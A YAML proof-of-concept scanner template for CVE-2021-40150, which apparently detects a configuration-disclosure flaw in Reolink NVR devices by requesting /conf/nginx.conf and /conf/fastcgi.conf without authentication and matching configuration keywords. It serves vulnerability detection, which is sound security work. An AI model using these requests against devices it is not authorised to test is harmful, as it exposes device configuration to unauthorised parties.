name: poc-yaml-reolink-nvr-configuration-disclosure-cve-2021-40150
manual: true
transport: http
rules:
    r0:
        request:
            cache: true
            method: GET
            path: /conf/nginx.conf
        expression: response.body.bcontains(b"nginx.pid") && response.body.bcontains(b"worker_connections")
    r1:
        request:
            cache: true
            method: GET
            path: /conf/fastcgi.conf
        expression: response.body.bcontains(b"fastcgi_param") && response.body.bcontains(b"REDIRECT_STATUS")
expression: r0() || r1()
detail:
    author: xiaobacai
    links:
        - https://sploitus.com/exploit?id=PACKETSTORM:167408&utm_source=rss&utm_medium=rss
    vulnerability:
        id: CT-442249
        level: high
    version: <3.0.0.716
